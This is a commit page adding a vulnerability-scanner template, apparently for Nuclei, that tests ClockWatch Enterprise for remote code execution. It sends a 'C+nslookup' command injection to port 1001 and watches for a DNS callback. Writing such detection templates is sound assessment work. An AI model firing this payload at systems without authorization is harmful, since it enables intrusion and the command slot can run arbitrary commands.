Create clockwatch-enterprise-rce.yaml

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-08 13:18:31 +09:00 · 2021-07-08 13:18:31 +09:00 · a722b9fff6
parent 83b9b4f341
commit a722b9fff6
1 changed files with 22 additions and 0 deletions
--- a/vulnerabilities/other/clockwatch-enterprise-rce.yaml
+++ b/vulnerabilities/other/clockwatch-enterprise-rce.yaml
@ -0,0 +1,22 @@
+id: clockwatch-enterprise-rce
+
+info:
+  name: ClockWatch Enterprise RCE
+  author: gy741
+  severity: critical
+  tags: clockwatch,rce
+  reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
+
+network:
+  - inputs:
+      - data: "C+nslookup {{interactsh-url}}"
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:1001"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"